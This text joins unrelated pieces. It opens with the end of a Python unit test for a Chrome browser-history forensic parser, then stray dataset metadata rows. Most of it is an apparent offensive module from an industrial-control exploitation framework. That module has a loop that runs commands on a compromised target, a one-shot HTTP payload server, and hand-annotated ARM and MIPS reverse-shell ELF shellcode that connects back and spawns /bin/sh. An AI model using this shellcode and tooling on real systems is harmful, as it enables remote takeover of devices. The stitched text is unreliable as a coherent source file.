        # Each History fixture contains 2 events (1 page visit, 1 file download).
        self.assertEqual(storage_writer.number_of_events, 2)

        events = list(storage_writer.GetEvents())

        # Check the page visit event.
        event = events[0]

        self.CheckTimestamp(event.timestamp, visit_timestamp)
        self.assertEqual(
            event.timestamp_desc, definitions.TIME_DESCRIPTION_LAST_VISITED)

        event_data = self._GetEventDataOfEvent(storage_writer, event)

        expected_url = (
            'https://raw.githubusercontent.com/dfirlabs/chrome-specimens/master/'
            'generate-specimens.sh')
        self.assertEqual(event_data.url, expected_url)

        expected_title = ''
        # Fixed: the title lives on the event data, not on the event itself
        # (testProcess58 previously asserted against event.title).
        self.assertEqual(event_data.title, expected_title)

        expected_message = (
            '{0:s} '
            '[count: 0] '
            'Type: [START_PAGE - The start page of the browser] '
            '(URL not typed directly - no typed count)').format(expected_url)
        expected_short_message = '{0:s}...'.format(expected_url[:77])

        self._TestGetMessageStrings(
            event_data, expected_message, expected_short_message)

        # Check the file downloaded event.
        event = events[1]

        self.CheckTimestamp(event.timestamp, download_timestamp)
        self.assertEqual(
            event.timestamp_desc, definitions.TIME_DESCRIPTION_FILE_DOWNLOADED)

        event_data = self._GetEventDataOfEvent(storage_writer, event)

        expected_url = (
            'https://raw.githubusercontent.com/log2timeline/l2tbinaries/master/'
            'win32/plaso-20171231.1.win32.msi')
        self.assertEqual(event_data.url, expected_url)

        expected_full_path = '/home/ubuntu/Downloads/plaso-20171231.1.win32.msi'
        self.assertEqual(event_data.full_path, expected_full_path)

        expected_message = (
            '{0:s} ({1:s}). '
            'Received: 3080192 bytes out of: 3080192 bytes.').format(
                expected_url, expected_full_path)
        expected_short_message = '{0:s} downloaded (3080192 bytes)'.format(
            expected_full_path)

        self._TestGetMessageStrings(
            event_data, expected_message, expected_short_message)

    def testProcess57(self):
        """Tests the Process function on a Google Chrome 57 History database."""
        self._TestChromeHistoryDatabase(
            'History-57.0.2987.133',
            '2018-01-21 14:09:53.885478',
            '2018-01-21 14:09:53.900399')

    def testProcess58(self):
        """Tests the Process function on a Google Chrome 58 History database."""
        self._TestChromeHistoryDatabase(
            'History-58.0.3029.96',
            '2018-01-21 14:09:27.315765',
            '2018-01-21 14:09:27.200398')

    def testProcess59(self):
        """Tests the Process function on a Google Chrome 59 History database."""
        self._TestChromeHistoryDatabase(
            'History-59.0.3071.86',
            '2018-01-21 14:08:52.037692',
            '2018-01-21 14:08:51.811123')
# Allow running this test module directly, outside the full test runner.
if __name__ == '__main__':
    unittest.main()
| 37.072202
| 77
| 0.711656
| 1,228
| 10,269
| 5.730456
| 0.144137
| 0.068211
| 0.068211
| 0.051158
| 0.884468
| 0.851357
| 0.851073
| 0.831178
| 0.816967
| 0.789541
| 0
| 0.053007
| 0.180641
| 10,269
| 276
| 78
| 37.206522
| 0.783337
| 0.102639
| 0
| 0.777778
| 0
| 0
| 0.219858
| 0.042335
| 0
| 0
| 0
| 0
| 0.169312
| 1
| 0.021164
| false
| 0
| 0.037037
| 0
| 0.068783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d271fcee0a3dd8fde9814b03fdd7230d51ece964
| 24,539
|
py
|
Python
|
icssploit/shell.py
|
tijldeneut/icssploit
|
e9c6c49fe69d0302b51021f476422dc5940d09bc
|
[
"BSD-2-Clause"
] | 20
|
2021-01-16T13:36:22.000Z
|
2022-03-23T08:00:41.000Z
|
icssploit/shell.py
|
tijldeneut/icssploit
|
e9c6c49fe69d0302b51021f476422dc5940d09bc
|
[
"BSD-2-Clause"
] | null | null | null |
icssploit/shell.py
|
tijldeneut/icssploit
|
e9c6c49fe69d0302b51021f476422dc5940d09bc
|
[
"BSD-2-Clause"
] | 7
|
2021-01-18T18:46:49.000Z
|
2021-09-10T06:37:49.000Z
|
import socket
import telnetlib
import http.server
import threading
from .printer import printer_queue
from icssploit.utils import (
print_info,
print_error,
print_success,
print_status,
random_text,
)
def shell(exploit, architecture="", method="", **params):
    """Interactive command loop executed against an exploited target.

    Reads commands from stdin and forwards them to ``exploit.execute``.
    The special command ``reverse_tcp <reverse ip> <port>`` delivers a
    reverse shell payload using the configured *method* ('wget', 'echo',
    'awk' or 'netcat'); ``quit`` / ``exit`` ends the loop.

    Args:
        exploit: exploit object providing ``execute(cmd)``.
        architecture: target architecture passed to reverse_shell.
        method: payload delivery method selecting the reverse_shell helper.
        **params: method-specific options ('binary', 'location', 'shell').
    """
    while True:
        # Busy-wait until queued printer output has been flushed so the
        # prompt does not interleave with pending messages.
        while not printer_queue.empty():
            pass
        # Bug fix: raw_input() is Python 2 only and raises NameError under
        # the Python 3 interpreter this module targets (see http.server
        # import); input() is the Python 3 equivalent.
        cmd = input("cmd > ")
        if cmd in ["quit", "exit"]:
            return
        c = cmd.split()
        if len(c) and c[0] == "reverse_tcp":
            if len(c) == 3:
                lhost = c[1]
                lport = c[2]
                revshell = reverse_shell(exploit, architecture, lhost, lport)
                if method == "wget":
                    revshell.wget(binary=params['binary'], location=params['location'])
                elif method == "echo":
                    revshell.echo(binary=params['binary'], location=params['location'])
                elif method == "awk":
                    revshell.awk(binary=params['binary'])
                elif method == "netcat":
                    revshell.netcat(binary=params['binary'], shell=params['shell'])
                else:
                    print_error("Reverse shell is not available")
            else:
                print_error("reverse_tcp <reverse ip> <port>")
        else:
            # Any other input is executed verbatim on the target.
            print_info(exploit.execute(cmd))
class HttpRequestHandler(http.server.SimpleHTTPRequestHandler):
    """Answers every GET with the payload staged on the server, then stops it."""

    def do_GET(self):
        # Fixed 200 response regardless of the requested path.
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        # NOTE(review): wfile.write() requires bytes on Python 3 -- assumes
        # self.server.content is a bytes object; confirm against callers.
        self.wfile.write(self.server.content)
        # One-shot behavior: flag HttpServer.serve_forever() to exit after
        # this request completes.
        self.server.stop = True

    def log_message(self, format, *args):
        # Suppress the default per-request logging to stderr.
        return
class HttpServer(http.server.HTTPServer):
    """HTTP server that serves a fixed payload until a handler sets self.stop."""

    def serve_forever(self, content):
        # NOTE(review): overrides HTTPServer.serve_forever() with a different
        # signature (extra `content` argument); only call this variant.
        self.stop = False
        # Stash the payload on the server instance so HttpRequestHandler.do_GET
        # can send it back.
        self.content = content
        # handle_request() serves one request at a time; the handler sets
        # self.stop = True after responding, which ends the loop.
        while not self.stop:
            self.handle_request()
class reverse_shell(object):
arm = (
# elf binary
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00"
"\x00\x00\x74\x80\x00\x00\x34\x00\x00\x00\x70\x01\x00\x00\x02\x02\x00\x05\x34\x00\x20\x00"
"\x02\x00\x28\x00\x07\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80"
"\x00\x00\x18\x01\x00\x00\x18\x01\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00"
"\x18\x01\x00\x00\x18\x01\x01\x00\x18\x01\x01\x00\x0b\x00\x00\x00\x0b\x00\x00\x00\x06\x00"
"\x00\x00\x00\x80\x00\x00"
# <_start>:
"\x84\x70\x9f\xe5" # ldr r7, [pc, #132]
"\x02\x00\xa0\xe3" # mov r0, #2
"\x01\x10\xa0\xe3" # mov r1, #1
"\x00\x20\xa0\xe3" # mov r2, #0
"\x00\x00\x00\xef" # svc 0x00000000
"\x00\x60\xa0\xe1" # mov r6, r0
"\x70\x50\x9f\xe5" # ldr r5, [pc, #112] ; 8104 <loop+0x50>
"\x04\x50\x2d\xe5" # push {r5} ; (str r5, [sp, #-4]!)
"\x6c\x50\x9f\xe5" # ldr r5, [pc, #108] ; 8108 <loop+0x54>
"\x04\x50\x2d\xe5" # push {r5} ; (str r5, [sp, #-4]!)
"\x0d\x10\xa0\xe1" # mov r1, sp
"\x10\x20\xa0\xe3" # mov r2, #16
"\x60\x70\x9f\xe5" # ldr r7, [pc, #96] ; 810c <loop+0x58>
"\x00\x00\x00\xef" # svc 0x00000000
"\x06\x00\xa0\xe1" # mov r0, r6
"\x03\x10\xa0\xe3" # mov r1, #3
# <loop>:
"\x01\x10\x51\xe2" # subs r1, r1, #1
"\x3f\x70\xa0\xe3" # mov r7, #63 ; 0x3f
"\x00\x00\x00\xef" # svc 0x00000000
"\xfb\xff\xff\x1a" # bne 80b4 <loop>
"\x44\x00\x9f\xe5" # ldr r0, [pc, #68] ; 8110 <loop+0x5c>
"\x00\x10\xa0\xe1" # mov r1, r0
"\x02\x20\x22\xe0" # eor r2, r2, r2
"\x04\x20\x2d\xe5" # push {r2} ; (str r2, [sp, #-4]!)
"\x38\x10\x9f\xe5" # ldr r1, [pc, #56] ; 8114 <loop+0x60>
"\x04\x10\x2d\xe5" # push {r1} ; (str r1, [sp, #-4]!)
"\x0d\x10\xa0\xe1" # mov r1, sp
"\x0b\x70\xa0\xe3" # mov r7, #11
"\x00\x00\x00\xef" # svc 0x00000000
"\x00\x00\xa0\xe3" # mov r0, #0
"\x01\x70\xa0\xe3" # mov r7, #1
"\x00\x00\x00\xef" # svc 0x00000000
"\x01\x70\xa0\xe3" # mov r7, #1
"\x00\x00\xa0\xe3" # mov r0, #0
"\x00\x00\x00\xef" # svc 0x00000000
"\x19\x01\x00\x00" # .word 0x00000119
"\x7f\x00\x00\x01" # .word 0x0100007f
"\x02\x00\x11\x5c" # .word 0x5c110002
"\x1b\x01\x00\x00" # .word 0x0000011b
"\x18\x01\x01\x00" # .word 0x00010118
"\x20\x01\x01\x00" # .word 0x00010120
# elf binary
"\x2f\x62\x69\x6e\x2f\x73\x68\x00\x73\x68\x00\x41\x13\x00\x00\x00\x61\x65\x61\x62\x69\x00"
"\x01\x09\x00\x00\x00\x06\x01\x08\x01\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72"
"\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x64"
"\x61\x74\x61\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00"
"\x01\x00\x00\x00\x06\x00\x00\x00\x74\x80\x00\x00\x74\x00\x00\x00\xa4\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x18\x01\x01\x00\x18\x01\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x27\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00"
"\x00\x00\x00\x00\x23\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x37\x01\x00\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\x02\x00\x00"
"\x40\x01\x00\x00\x06\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00"
"\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x03\x00\x00\x70\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x80\x00\x00\x00\x00\x00\x00"
"\x03\x00\x01\x00\x00\x00\x00\x00\x18\x01\x01\x00\x00\x00\x00\x00\x03\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x04\x00\xf1\xff\x0f\x00\x00\x00\x18\x01\x01\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x16\x00\x00\x00\x20\x01\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x19\x00\x00\x00"
"\x74\x80\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x1c\x00\x00\x00\xb4\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x21\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x21\x00\x00\x00\x18\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x24\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00"
"\x10\x00\x02\x00\x2f\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x3d\x00"
"\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x49\x00\x00\x00\x74\x80\x00\x00"
"\x00\x00\x00\x00\x10\x00\x01\x00\x50\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00"
"\x02\x00\x5c\x00\x00\x00\x24\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x64\x00\x00\x00"
"\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x6b\x00\x00\x00\x24\x01\x01\x00\x00\x00"
"\x00\x00\x10\x00\x02\x00\x00\x72\x65\x76\x65\x72\x73\x65\x5f\x74\x63\x70\x2e\x6f\x00\x62"
"\x69\x6e\x61\x72\x79\x00\x73\x68\x00\x24\x61\x00\x6c\x6f\x6f\x70\x00\x24\x64\x00\x5f\x62"
"\x73\x73\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x5f\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x5f\x5f"
"\x00\x5f\x5f\x62\x73\x73\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f"
"\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x65\x64\x61"
"\x74\x61\x00\x5f\x65\x6e\x64\x00"
)
mipsel = (
# elf binary
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00"
"\x00\x00\x90\x00\x40\x00\x34\x00\x00\x00\x8c\x01\x00\x00\x00\x10\x00\x50\x34\x00\x20\x00"
"\x02\x00\x28\x00\x06\x00\x03\x00\x00\x00\x00\x70\x74\x00\x00\x00\x74\x00\x40\x00\x74\x00"
"\x40\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x60\x01\x00\x00\x60\x01\x00\x00\x05\x00"
"\x00\x00\x00\x00\x01\x00\xf4\x11\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x50\x81\x41\x00\x00\x00\x00\x00"
# <_ftext>:
"\xff\xff\x04\x28" # slti a0,zero,-1
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\x11\x11\x04\x28" # slti a0,zero,4369
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\xfd\xff\x0c\x24" # li t4,-3
"\x27\x20\x80\x01" # nor a0,t4,zero
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\xfd\xff\x0c\x24" # li t4,-3
"\x27\x20\x80\x01" # nor a0,t4,zero
"\x27\x28\x80\x01" # nor a1,t4,zero
"\xff\xff\x06\x28" # slti a2,zero,-1
"\x57\x10\x02\x24" # li v0,4183
"\x0c\x09\x09\x01" # syscall 0x42424
"\xff\xff\x44\x30" # andi a0,v0,0xffff
"\xc9\x0f\x02\x24" # li v0,4041
"\x0c\x09\x09\x01" # syscall 0x42424
"\xc9\x0f\x02\x24" # li v0,4041
"\x0c\x09\x09\x01" # syscall 0x42424
"\x7a\x69\x05\x3c" # lui a1,0x697a
"\x02\x00\xa5\x34" # ori a1,a1,0x2
"\xf8\xff\xa5\xaf" # sw a1,-8(sp)
"\x00\x01\x05\x3c" # lui a1,0x100
"\x7f\x00\xa5\x34" # ori a1,a1,0x7f
"\xfc\xff\xa5\xaf" # sw a1,-4(sp)
"\xf8\xff\xa5\x23" # addi a1,sp,-8
"\xef\xff\x0c\x24" # li t4,-17
"\x27\x30\x80\x01" # nor a2,t4,zero
"\x4a\x10\x02\x24" # li v0,4170
"\x0c\x09\x09\x01" # syscall 0x42424
"\x62\x69\x08\x3c" # lui t0,0x6962
"\x2f\x2f\x08\x35" # ori t0,t0,0x2f2f
"\xec\xff\xa8\xaf" # sw t0,-20(sp)
"\x73\x68\x08\x3c" # lui t0,0x6873
"\x6e\x2f\x08\x35" # ori t0,t0,0x2f6e
"\xf0\xff\xa8\xaf" # sw t0,-16(sp)
"\xff\xff\x07\x28" # slti a3,zero,-1
"\xf4\xff\xa7\xaf" # sw a3,-12(sp)
"\xfc\xff\xa7\xaf" # sw a3,-4(sp)
"\xec\xff\xa4\x23" # addi a0,sp,-20
"\xec\xff\xa8\x23" # addi t0,sp,-20
"\xf8\xff\xa8\xaf" # sw t0,-8(sp)
"\xf8\xff\xa5\x23" # addi a1,sp,-8
"\xec\xff\xbd\x27" # addiu sp,sp,-20
"\xff\xff\x06\x28" # slti a2,zero,-1
"\xab\x0f\x02\x24" # li v0,4011
"\x0c\x09\x09\x01" # syscall 0x42424
# elf binary
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e"
"\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x72\x65\x67\x69"
"\x6e\x66\x6f\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x06\x00\x00\x70\x02\x00\x00\x00\x74\x00"
"\x40\x00\x74\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00"
"\x18\x00\x00\x00\x24\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x90\x00\x40\x00\x90\x00"
"\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
"\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x2a\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7c\x02\x00\x00\xc0\x00\x00\x00\x05\x00"
"\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x03\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x74\x00\x40\x00\x00\x00\x00\x00\x03\x00\x01\x00\x00\x00"
"\x00\x00\x90\x00\x40\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x60\x01\x41\x00"
"\x00\x00\x00\x00\x10\x00\x02\x00\x08\x00\x00\x00\x50\x81\x41\x00\x00\x00\x00\x00\x10\x00"
"\xf1\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x14\x00\x00\x00"
"\x90\x00\x40\x00\x00\x00\x00\x00\x10\x00\x02\x00\x1b\x00\x00\x00\x90\x00\x40\x00\x00\x00"
"\x00\x00\x11\x00\x02\x00\x22\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff"
"\x2e\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff\x35\x00\x00\x00\x60\x01"
"\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff\x3a\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00"
"\x10\x00\xf1\xff\x00\x5f\x66\x64\x61\x74\x61\x00\x5f\x67\x70\x00\x5f\x5f\x73\x74\x61\x72"
"\x74\x00\x5f\x66\x74\x65\x78\x74\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x62\x73\x73\x5f"
"\x73\x74\x61\x72\x74\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x66\x62\x73"
"\x73\x00"
)
mips = (
# elf binary
"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00"
"\x00\x01\x00\x40\x00\x90\x00\x00\x00\x34\x00\x00\x01\x8c\x50\x00\x10\x00\x00\x34\x00\x20"
"\x00\x02\x00\x28\x00\x06\x00\x03\x70\x00\x00\x00\x00\x00\x00\x74\x00\x40\x00\x74\x00\x40"
"\x00\x74\x00\x00\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01"
"\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x01\x60\x00\x00\x01\x60\x00\x00"
"\x00\x05\x00\x01\x00\x00\x20\x00\x11\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x41\x81\x50\x00\x00\x00\x00"
# <_ftext>:
"\x28\x04\xff\xff" # slti a0,zero,-1
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x28\x04\x11\x11" # slti a0,zero,4369
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x0c\xff\xfd" # li t4,-3
"\x01\x80\x20\x27" # nor a0,t4,zero
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x0c\xff\xfd" # li t4,-3
"\x01\x80\x20\x27" # nor a0,t4,zero
"\x01\x80\x28\x27" # nor a1,t4,zero
"\x28\x06\xff\xff" # slti a2,zero,-1
"\x24\x02\x10\x57" # li v0,4183
"\x01\x09\x09\x0c" # syscall 0x42424
"\x30\x44\xff\xff" # andi a0,v0,0xffff
"\x24\x02\x0f\xc9" # li v0,4041
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x02\x0f\xc9" # li v0,4041
"\x01\x09\x09\x0c" # syscall 0x42424
"\x3c\x05\x00\x02" # lui a1,0x2
"\x34\xa5\x7a\x69" # ori a1,a1,0x7a69
"\xaf\xa5\xff\xf8" # sw a1,-8(sp)
"\x3c\x05\xc0\xa8" # lui a1,0xc0a8
"\x34\xa5\x01\x37" # ori a1,a1,0x137
"\xaf\xa5\xff\xfc" # sw a1,-4(sp)
"\x23\xa5\xff\xf8" # addi a1,sp,-8
"\x24\x0c\xff\xef" # li t4,-17
"\x01\x80\x30\x27" # nor a2,t4,zero
"\x24\x02\x10\x4a" # li v0,4170
"\x01\x09\x09\x0c" # syscall 0x42424
"\x3c\x08\x2f\x2f" # lui t0,0x2f2f
"\x35\x08\x62\x69" # ori t0,t0,0x6269
"\xaf\xa8\xff\xec" # sw t0,-20(sp)
"\x3c\x08\x6e\x2f" # lui t0,0x6e2f
"\x35\x08\x73\x68" # ori t0,t0,0x7368
"\xaf\xa8\xff\xf0" # sw t0,-16(sp)
"\x28\x07\xff\xff" # slti a3,zero,-1
"\xaf\xa7\xff\xf4" # sw a3,-12(sp)
"\xaf\xa7\xff\xfc" # sw a3,-4(sp)
"\x23\xa4\xff\xec" # addi a0,sp,-20
"\x23\xa8\xff\xec" # addi t0,sp,-20
"\xaf\xa8\xff\xf8" # sw t0,-8(sp)
"\x23\xa5\xff\xf8" # addi a1,sp,-8
"\x27\xbd\xff\xec" # addiu sp,sp,-20
"\x28\x06\xff\xff" # slti a2,zero,-1
"\x24\x02\x0f\xab" # li v0,4011
"\x00\x90\x93\x4c" # syscall 0x2424d
# elf binary
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e"
"\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x72\x65\x67\x69"
"\x6e\x66\x6f\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x70\x00\x00\x06\x00\x00\x00\x02\x00\x40"
"\x00\x74\x00\x00\x00\x74\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
"\x00\x00\x00\x18\x00\x00\x00\x24\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\x90\x00\x00"
"\x00\x90\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00"
"\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x60\x00\x00"
"\x00\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01"
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x7c\x00\x00\x00\xc0\x00\x00"
"\x00\x05\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x3c\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x74\x00\x00\x00\x00\x03\x00\x00\x01\x00\x00"
"\x00\x00\x00\x40\x00\x90\x00\x00\x00\x00\x03\x00\x00\x02\x00\x00\x00\x01\x00\x41\x01\x60"
"\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x08\x00\x41\x81\x50\x00\x00\x00\x00\x10\x00"
"\xff\xf1\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x14"
"\x00\x40\x00\x90\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x1b\x00\x40\x00\x90\x00\x00"
"\x00\x00\x11\x00\x00\x02\x00\x00\x00\x22\x00\x41\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1"
"\x00\x00\x00\x2e\x00\x41\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1\x00\x00\x00\x35\x00\x41"
"\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1\x00\x00\x00\x3a\x00\x41\x01\x60\x00\x00\x00\x00"
"\x10\x00\xff\xf1\x00\x5f\x66\x64\x61\x74\x61\x00\x5f\x67\x70\x00\x5f\x5f\x73\x74\x61\x72"
"\x74\x00\x5f\x66\x74\x65\x78\x74\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x62\x73\x73\x5f"
"\x73\x74\x61\x72\x74\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x66\x62\x73"
"\x73\x00"
)
exploit = None
arch = None
lhost = None
lport = None
binary_name = None
revshell = None
def __init__(self, exploit, arch, lhost, lport):
self.exploit = exploit
self.arch = arch
self.lhost = lhost
self.lport = lport
def convert_ip(self, addr):
    """Pack a dotted-quad IPv4 address into a 4-character byte-valued string."""
    return "".join(chr(int(octet)) for octet in addr.split("."))
def convert_port(self, p):
    """Pack a TCP port number into two big-endian byte-valued characters.

    Returns a ``str`` (not ``bytearray``): ``generate_binary`` splices the
    result into the str-typed shellcode templates, and ``str + bytearray``
    raises TypeError on Python 3. latin-1-range characters keep the exact
    byte values the shellcode expects.
    """
    port = int(p)
    return chr((port >> 8) & 0xff) + chr(port & 0xff)
def generate_binary(self, lhost, lport):
